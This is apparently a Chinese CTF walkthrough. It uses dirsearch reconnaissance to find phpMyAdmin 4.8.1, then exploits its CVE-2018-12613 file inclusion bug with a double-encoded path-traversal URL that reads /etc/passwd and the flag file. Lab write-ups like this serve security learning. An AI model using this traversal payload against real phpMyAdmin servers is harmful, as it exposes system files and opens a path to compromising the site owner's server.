打开题目

我们用dirsearch扫描一下后台看看

扫描结果如下

我们访问一下robots.txt看看，提示有phpinfo.php

那我们访问一下phpinfo.php

发现没有任何信息后我们转去看看phpmyadmin看看

成功访问到页面

在这里我们看到phpmyadmin的版本号是4.8.1

我们百度搜索一下看看

我们知道phpmyadmin4.8.1存在远程文件包含漏洞

输入​/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可以看到能够成功执行

那我们尝试一下直接寻找flag

​/index.php?target=db_sql.php%253f/../../../../../../../../flag

直接就得到了flag

知识点：

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

参考：

phpMyAdmin 4.8.1后台文件包含漏洞（CVE-2018-12613）_phpmyadmin cve-2018-12613漏洞获取webshell-CSDN博客